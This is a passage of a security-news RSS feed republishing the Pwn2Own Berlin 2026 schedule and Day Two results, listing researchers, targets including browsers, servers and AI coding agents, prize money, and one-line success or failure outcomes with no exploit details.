href="https://docs.npmjs.com/cli/v10/configuring-npm/package-json#optionaldependencies">https://docs.npmjs.com/cli/v10/configuring-npm/package-json#optionaldependencies</a></p><p class=""><a href="https://groups.google.com/g/nodejs/c/5BGr5dliUIk/m/abJEH3sPymcJ?pli=1">https://groups.google.com/g/nodejs/c/5BGr5dliUIk/m/abJEH3sPymcJ?pli=1</a></p><p class=""><a href="https://github.com/nodejs/node-v0.x-archive/issues/8830">https://github.com/nodejs/node-v0.x-archive/issues/8830</a></p><p class=""><a href="https://bounty.github.com/ineligible.html#vulnerability_in_upstream_dependencies:~:text=eligible%20for%20rewards.-,Local%20access,-Vulnerabilities%20which%20require">https://bounty.github.com/ineligible.html#vulnerability_in_upstream_dependencies:~:text=eligible%20for%20rewards.-,Local%20access,-Vulnerabilities%20which%20require</a></p><p class=""><a href="https://github.com/nodejs/node/security/policy#examples-of-non-vulnerabilities">https://github.com/nodejs/node/security/policy#examples-of-non-vulnerabilities</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pwn2Own Berlin 2026: The Full Schedule]]></title>
<description><![CDATA[Willkommen! (Welcome!) Pwn2Own Berlin 2026 has arrived at OffensiveCon, and the world’s top security researchers are ready. This year’s enterprise-focused competition features AI Databases, Coding Agents, Local Inferences, and a separate category for NVIDIA products.Earlier today, we held the ran...]]></description>
<link>https://tsecurity.de/de/3694567/hacking/pwn2own-berlin-2026-the-full-schedule/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694567/hacking/pwn2own-berlin-2026-the-full-schedule/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">Willkommen! (Welcome!) Pwn2Own Berlin 2026 has arrived at OffensiveCon, and the world’s top security researchers are ready. This year’s enterprise-focused competition features AI Databases, Coding Agents, Local Inferences, and a separate category for NVIDIA products.</p><p class="">Earlier today, we held the random draw to determine attempt order. Below is the official schedule. All times are Berlin local time (CET) and may change as the competition progresses. Check back for live updates.</p><p class="">In case you missed it, you can watch the draw <a href="https://youtube.com/live/Dtp-ICE0crw" target="_blank">here</a>. </p>





















  
  




  


  
  
    
    
      
        
        
        
          
          
            
        
        
          
        
        
            
          
        
        
      
    
  
  
    



  



  

<p>Jump to: 
<a data-preserve-html-node="true" name="top"></a></p>
<p><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/5/13/pwn2own-berlin-2026-the-full-schedule#day1" tabindex="0">Day One</a></p>
<p><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/5/13/pwn2own-berlin-2026-the-full-schedule#day2" tabindex="0">Day Two</a></p>
<p><a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/5/13/pwn2own-berlin-2026-the-full-schedule#day3" tabindex="0">Day Three</a></p>
<p><a data-preserve-html-node="true" name="day1"></a></p>




  <p class="">DAY ONE</p><p class=""><strong>Thursday, May 14 - 1030</strong></p><p class="">chompie of IBM X-Force Offensive Research (XOR) targeting NV Container Toolkit in the NVIDIA category for a total of $50,000 and 5 Master of Pwn points</p><p class="">Le Duc Anh Vu ( @vulda ) of Viettel Cyber Security (@vcslab) targeting OpenAI Codex in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Orange Tsai (@orange_8361) of DEVCORE Research Team (@d3vc0r3) targeting Microsoft Edge – Sandbox Escape in the Web Browser category for a total of $175,000 and 17.5 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1130</strong></p><p class="">k3vg3n targeting LiteLLM in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Satoki Tsuji (@satoki00) / Ikotas Labs, Inc. targeting Megatron Bridge in the NVIDIA category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1300</strong></p><p class="">Angelboy (@scwuaptx) of DEVCORE Research Team and TwinkleStar03 (@_twinklestar03), working with DEVCORE Internship Program targeting Microsoft Windows 11 in the Local Escalation of Privilege category for a total of $30,000 and 3 Master of Pwn points</p><p class="">Emanuele Barbeno, Cyrill Bannwart, Yves Bieri, Lukasz D., Urs Mueller of Compass Security (@compasssecurity) targeting OpenAI Codex in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Park Jae Min (@hiariz) targeting Oracle Autonomous AI Database in the AI Database category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1400</strong></p><p class="">Satoki Tsuji (@satoki00) / Ikotas Labs, Inc. targeting LiteLLM in the Local Inference category for a total of $40,000 and 4 Master of Pwn points.</p><p class="">Yoseop kim(@pwning_me) targeting Megatron Bridge in the NVIDIA category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1500</strong> </p><p class="">Ben Koo (@kiddo_pwn) of Team DDOS targeting Mozilla Firefox – Renderer Only in the Web Browser category for a total of $50,000 and 5 Master of Pwn points</p><p class="">Interrupt Labs targeting NV Container Toolkit in the NVIDIA category for a total of $50,000 and 5 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1530</strong></p><p class="">maitai (@MaitaiThe) of Doyensec (@Doyensec) targeting OpenAI Codex in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1600</strong></p><p class="">Billy (@st424204), Pan Zhenpeng(@Peterpan980927), Weiming Shi (@bestswngs) of STARLabs SG (@starlabs_sg) targeting LM Studio in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Marcin Wiązowski targeting Microsoft Windows 11 in the Local Escalation of Privilege category for a total of $30,000 and 3 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1630</strong></p><p class="">haehae (@haehaeYang) of Out Of Bounds targeting Chroma in the AI Database category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1730</strong></p><p class="">chompie of IBM X-Force Offensive Research (XOR) targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class="">Yoseop Kim(@pwning_me) targeting Mozilla Firefox – Renderer Only in the Web Browser category for a total of $50,000 and 5 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1800</strong></p><p class="">@rewhiles of Viettel Cyber Security (@vcslab) targeting Anthropic Claude Code in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1830</strong></p><p class="">Kentaro Kawane of GMO Cybersecurity by Ierae targeting Microsoft Windows 11 in the Local Escalation of Privilege category for a total of $30,000 and 3 Master of Pwn points</p><p class="">Qrious Secure (@qriousec) targeting LM Studio in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Thursday, May 14 - 1900</strong></p><p class="">haehae (@haehaeYang) of Out of Bounds targeting Megatron Bridge in the NVIDIA category for a total of $20,000 and 2 Master of Pwn points</p>





















  
  



<p><a data-preserve-html-node="true" name="day2"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/5/13/pwn2own-berlin-2026-the-full-schedule#top"><i data-preserve-html-node="true">Back to top</i></a></p>




  <p class="">DAY TWO</p><p class=""><strong>Friday, May 15 - 1030</strong></p><p class="">Ben Koo (@kiddo_pwn) of Team DDOS targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class="">Stephen Fewer (Rapid7) targeting Microsoft SharePoint in the Server category for a total of $100,000 and 10 Master of Pwn points</p><p class="">Tao Yan (@Ga1ois) and Edouard Bochin (@le_douds) from Palo Alto Networks targeting Apple Safari – Renderer Only in the Web Browser category for a total of $75,000 and 7.5 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1130</strong></p><p class="">Le Duc Anh Vu ( @vulda ) of Viettel Cyber Security (@vcslab) targeting Cursor in the Coding Agent category for a total of $30,000 and 3 Master of Pwn points</p><p class="">Nikolaos Mourousias (@deltaclock), Caue Obici (@caueobici) and Bruno Halltari (@BrunoModificato) of OtterSec targeting LM Studio in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam). targeting Anthropic Claude Code in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1300</strong></p><p class="">Ruitong from the Abstract Team at the University of Colorado Boulder targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1330</strong></p><p class="">Kiyong Kwak of Kakaogames and Song Nuri of Samsung Electronics targeting Apple Safari – Renderer Only in the Web Browser category for a total of $75,000 and 7.5 Master of Pwn points</p><p class="">Orange Tsai (@orange_8361) of DEVCORE Research Team targeting Microsoft Exchange in the Server category for a total of $200,000 and 20 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1400</strong></p><p class="">Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam). targeting OpenAI Codex in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1430</strong></p><p class="">Billy (@st424204), Bruce Chen(@bruce30262), Pan Zhenpeng(@Peterpan980927), Weiming Shi (@bestswngs ) of STARLabs SG (@starlabs_sg) targeting Megatron Bridge in the NVIDIA category for a total of $20,000 and 2 Master of Pwn points</p><p class="">David Tae, Louis Hur of Out Of Bounds targeting Ollama in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1530</strong></p><p class="">Team: Alon Ben Tsur (@iamgweej), Yahav Azran (@_yahav) targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1600</strong></p><p class="">@rewhiles of Viettel Cyber Security (@vcslab) targeting Mozilla Firefox – Renderer Only in the Web Browser category for a total of $50,000 and 5 Master of Pwn points</p><p class="">Siyeon Wi targeting Microsoft Windows 11 in the Local Escalation of Privilege category for a total of $30,000 and 3 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1630</strong></p><p class="">Byung Young Yi (@yibarrack) of Out Of Bounds targeting LiteLLM in the Local Inference category for a total of $40,000 and 4 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1700</strong></p><p class="">Emanuele Barbeno, Cyrill Bannwart, Yves Bieri, Lukasz D., Urs Mueller of Compass Security (@compasssecurity) targeting Cursor in the Coding Agent category for a total of $30,000 and 3 Master of Pwn points</p><p class=""><strong>Friday, May 15 - 1800</strong></p><p class="">Daniel Cohen Hillel (@0xDACA) targeting NV Container Toolkit in the NVIDIA category for a total of $50,000 and 5 Master of Pwn points</p>





















  
  



<p><a data-preserve-html-node="true" name="day3"></a>
<a data-preserve-html-node="true" href="https://www.thezdi.com/blog/2026/5/13/pwn2own-berlin-2026-the-full-schedule#top"><i data-preserve-html-node="true">Back to top</i></a></p>




  <p class="">DAY THREE</p><p class=""><strong>Saturday, May 16 - 1100</strong></p><p class="">Le Tran Hai Tung (@tacbliw), dungnm (@dungnm_) and hieuvd (@gr4ss341) of Viettel Cyber Security (@vcslab) targeting Microsoft Windows 11 in the Local Escalation of Privilege category for a total of $30,000 and 3 Master of Pwn points</p><p class="">Satoki Tsuji (@satoki00) / Ikotas Labs, Inc. targeting OpenAI Codex in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam). targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class=""><strong>Saturday, May 16 - 1330</strong></p><p class="">Emanuele Barbeno, Cyrill Bannwart, Yves Bieri, Lukasz D., Urs Mueller of Compass Security (@compasssecurity) targeting Anthropic Claude Code in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Hyunwoo Kim (@v4bel) targeting Red Hat Enterprise Linux for Workstations in the Local Escalation of Privilege category for a total of $20,000 and 2 Master of Pwn points</p><p class="">Team: Giuseppe Calì (@_gcali) of Summoning Team targeting VMware ESXi in the Virtualization category with the Cross-tenant Code Execution Addon add-on for a total of $200,000 and 20 Master of Pwn points</p><p class=""><strong>Saturday, May 16 - 1430</strong></p><p class="">splitline (@_splitline_) of DEVCORE Research Team targeting Microsoft SharePoint in the Server category for a total of $100,000 and 10 Master of Pwn points</p><p class=""><strong>Saturday, May 16 - 1600</strong></p><p class="">Byung Young Yi (@yibarrack) of Out Of Bounds targeting Anthropic Claude Code in the Coding Agent category for a total of $40,000 and 4 Master of Pwn points</p><p class="">Nguyen Hoang Thach (@hi_im_d4rkn3ss) of STARLabs SG (@starlabs_sg) targeting VMware ESXi in the Virtualization category with the Cross-tenant Code Execution Addon add-on for a total of $200,000 and 20 Master of Pwn points</p><p class="">Follow the action live! We’ll be posting real-time updates and results throughout the competition on our <a href="https://www.zerodayinitiative.com/blog">blog</a> and across social media. Stay up to date by following us on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, and <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a>, and join the conversation using #Pwn2Own Berlin and #P2OBerlin for continuous coverage. </p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pwn2Own Berlin 2026 - Day Two Results]]></title>
<description><![CDATA[Day Two of Pwn2Own Berlin 2026 and the stakes continue to rise! Security researchers are back on the Pwn2Own stage, pushing enterprise systems to their limits as the competition heats up. More exploits, more surprises, and more standout moments are unfolding, so follow along here for live updates...]]></description>
<link>https://tsecurity.de/de/3694565/hacking/pwn2own-berlin-2026-day-two-results/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694565/hacking/pwn2own-berlin-2026-day-two-results/</guid>
<pubDate>Sat, 25 Jul 2026 19:02:55 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">Day Two of Pwn2Own Berlin 2026 and the stakes continue to rise! Security researchers are back on the Pwn2Own stage, pushing enterprise systems to their limits as the competition heats up. More exploits, more surprises, and more standout moments are unfolding, so follow along here for live updates as the race for Master of Pwn intensifies. There were plenty of big targets on the schedule today, including SharePoint, Exchange, and Safari.</p><p class="">Following an action-packed Day One where $523,000 was awarded for 24 unique 0-day vulnerabilities, Day Two added another $385,750 and 15 unique 0-days, bringing event totals to $908,750 with 39 unique vulnerabilities overall. DEVCORE holds a commanding lead for Master of Pwn with 40.5 points and $405,000, but with one day still to go, anything can happen. Here are the standings as of Day Two but we'll see what the final day of the contest brings. Stay tuned!</p>





















  
  














































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg" data-image-dimensions="1920x1080" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=1000w" width="1920" height="1080" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/a74891c9-207d-4f66-b6af-b817cc37747d/Day+Two_P2O-Berlin+2026+Master+of+Pwn+Leaderboard.jpg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  





  <p class="">We’ll be posting real-time updates and results throughout the competition right here on our <a href="https://www.zerodayinitiative.com/blog">blog</a> and across social media. Stay up to date by following us on <a href="https://www.twitter.com/thezdi">Twitter</a>, <a href="https://infosec.exchange/@thezdi">Mastodon</a>, <a href="https://www.linkedin.com/company/zerodayinitiative">LinkedIn</a>, and <a href="https://bsky.app/profile/thezdi.bsky.social">Bluesky</a>, and join the conversation using #Pwn2Own Berlin and #P2OBerlin for continuous coverage. </p>





















  
  



<p><b data-preserve-html-node="true">FAILURE</b> - Unfortunately, Tao Yan &amp; Edouard Bochin of Palo Alto Networks could not get their exploit of Apple Safari – Renderer Only working within the time allotted.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/3078b5fc-5631-4eab-a575-6a6ff9addd33/Image+%281%29.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">FAILURE</b> - Unfortunately, Stephen Fewer of Rapid7 could not get their exploit of Microsoft SharePoint working within the time allotted.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg" data-image-dimensions="1024x768" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=1000w" width="1024" height="768" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/866d6dae-40a6-46fc-a186-f0c04a015115/Image.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Ben Koo (@kiddo_pwn) of Team DDOS used a use-after-free bug to escalate privileges on Red Hat Enterprise Linux for Workstations in the second round, earning $10,000 and 1 Master of Pwn point.</p>











































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg" data-image-dimensions="1767x1330" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=1000w" width="1767" height="1330" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/293da053-d5eb-4c61-8d64-9609563a770d/Media.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Dialed in! Nikolaos Mourousias (@deltaclock), Caue Obici (@caueobici) &amp; Bruno Halltari (@BrunoModificato) of OtterSec used a Code Injection bug to exploit LM Studio in the second round, earning $20,000 and 4 Master of Pwn points. Full win!</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png" data-image-dimensions="1776x366" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=1000w" width="1776" height="366" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/701ed64a-a1af-4028-8e69-62d6aeeaf60e/Screenshot+2026-05-15+at+5.37.51%E2%80%AFAM.png?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">COLLISON</b> - Although successful on stage, Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) targeting Claude Desktop in the Coding Agent category used a bug that was previously known. They still earn $10,000 and 2 Master of Pwn points.</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
                <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg" data-image-dimensions="2160x3840" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" data-sqsp-image-classic-block-image src="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=1000w" width="2160" height="3840" sizes="(max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=1500w 1500w, https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/554596ab-a59d-4dc3-ab26-db026595a4e6/sinsinology_claude.jpeg?format=2500w 2500w" loading="lazy" decoding="async" data-loader="sqs">

            
          
        
          
        

        
      
        </figure>
      

    
  


  


<p><b data-preserve-html-node="true">SUCCESS</b> - Le Duc Anh Vu (@vulda17) of Viettel Cyber Security (@vcslab) exploited Cursor, earning $30,000 and 3 Master of Pwn points. Full win!</p>












































  

    
  
    

      

      
        <figure class="
              sqs-block-image-figure
              intrinsic
            ">
          
        
        

        
          
            
          
            
                
                
                
                
                
                
                
